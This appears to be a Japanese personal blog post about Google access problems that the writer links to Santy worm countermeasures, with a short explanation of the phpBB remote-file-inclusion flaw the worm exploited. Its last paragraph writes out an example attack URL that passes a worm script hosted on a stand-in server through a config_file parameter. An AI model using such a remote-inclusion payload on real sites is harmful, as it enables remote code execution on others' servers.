モーグルとカバとパウダーの日記

モーグルやカバ(EXカービング)山スキー(BC)などがメインの日記でした。今は仕事のコンピュータ系のネタが主になっています。以前はスパム対策関連が多かったのですが最近はディープラーニング関連が多めです。

Googleの不調とSantyの関連

12/22あたりからGoogleが表示できなかったり、ページのキャッシュだけ開けなかったりとか、どうも調子が悪かった。
調べてみると、DNSが引いてくるIPがちょこちょこ変わったり、引いてくるIPが同じでも表示できたり出来なかったりして、どうやらGoogle側での障害だったようだ。
下記サイト等に参考情報があり、安定しているGoogleのサーバを強制的に引かせるようにするとかの対策がある模様。
しかし、Googleみたいなサイトが不調になると、こっちのネットワークがまずいんではないかと心配になってしまう。

大切な日々:google の検索ページが開かない事象について【google 障害 不調】
rayboy-blog:Googleが不調(情報と対策)


原因が公表されているわけではないが、どうやらSantyというワームが、phpBBという掲示板のセキュリティホールを突いて広まるのにGoogleで検索してターゲットを探していたため、その対策を掛けた際の悪影響が出ているようだった。

Null + 幻想蹴球日誌:Google 不調
グーグル検索を悪用するSantyワーム、オンライン掲示板に感染 - Yahoo!ニュース - コンピュータ - CNET Japan
ITmediaニュース:PHPのコード問題を突くSantyワームの亜種が出現


ちなみにこのセキュリティホールは、php掲示板の設定ファイルを指定するのに、URLからパラメータ渡しが出来るようになっていて、それがinclude関数とか、スクリプト自体をURLで渡すことの出来る機能を使っていたためとのこと。
つまり、「http://example.co.jp/phpBBS.php?config_file=http://worm.server/worm.script.php」みたいに書くと、wormのスクリプトが動いちゃうようになってたわけです。
こういう単純な脆弱性のあるプログラムって、意外に多いように思う。